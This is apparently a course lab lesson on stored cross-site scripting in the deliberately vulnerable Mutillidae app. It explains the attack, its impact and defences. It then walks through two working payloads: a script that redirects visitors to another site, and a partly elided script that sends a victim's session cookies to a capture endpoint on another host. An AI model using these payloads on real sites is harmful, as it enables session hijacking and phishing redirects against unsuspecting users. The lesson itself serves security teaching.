Lesson 2: Stored XSS (Cross-Site Scripting) Page Redirection

Stored XSS occurs when malicious scripts are permanently stored on a web server (e.g., in a database or comment field) and later executed in users’ browsers when they view the infected content. In page redirection attacks, the injected script automatically redirects users to a malicious or phishing site without their consent.

Impact:

• Users are silently redirected to harmful sites.

• Can lead to phishing, malware downloads, or credential theft.

• Damages user trust and site reputation.

Prevention:

• Properly sanitize and encode all user input/output.

• Use Content Security Policy (CSP).

• Employ security libraries or frameworks that guard against XSS.

Now, let’s try to implement an XSS example for fun. 🍼

On Kali Linux VM open Mutillidae and reset the database.

1. Navigate through the menu:
   OWASP 2017 → A7 — Cross Site Scripting (XSS) → Persistent → Add to Your Blog.

2. In the Add to Your Blog page, enter the following script:

<script>window.location = "http://www.offensive-security.com/"</script>

On your Windows 10 VM

▪ Open Firefox and go to the main Mutillidae page. Then go to the Add to your blog page.

▪ You will notice that the page is being redirected to http://www.offensive-security.com.

Grabbing Session Tokens with Stored XSS

On your Kali Linux VM

▪ Navigate to the Mutillidae Login/Register page in Firefox.

▪ Create a user with the name “hacker” and log in as that user.

▪ Paste the following script into the Add to Your Blog page (as the hacker user) If you still get redirected because of previous testing, you need to click on Reset DB again.

<script> 
   var lXMLHTTP; 
   try{  
   var lData = "data=" + encodeURIComponent(document.cookie); 
   var lHost = "gliyanage187787-uws"; 
   var lProtocol = "http"; 
   var lFilePath = "/mutillidae/capture-data.php"; 

   //---(The middle portion of the script has been taken out to save space)---

   lXMLHTTP.setRequestHeader("Host", lHost);  
   lXMLHTTP.setRequestHeader("Content-Type", "application/x-www
   form-urlencoded");    
   lXMLHTTP.send(lData); 
   }catch(e){  
   }  
</script>

▪ Click on Save Blog Entry.

If you want to refer more Mutillidae scripts;
Click on the Installation Instructions: Windows 7 (PDF) listed under the Documentation menu on the left. You may be prompted to save the file. Do not save the file. We are only interested in where this file is located on the server.

Delete everything after …documentation/ in the URL and hit enter

From the index page you have just found, click on/open Mutillidae-Test-Scripts.txt file.

On your Windows 10 VM

▪ Create a new user named “gliyanage” then log in as that user

▪ Navigate to the View Someone’s Blog Page and choose to show all blog entries.

On your Kali Linux VM

▪ Navigate to the View Captured Data Page to see the information that was logged in the background.

Now you can see that the session tokens of user ‘gliyanage’ have been captured by the hacker user.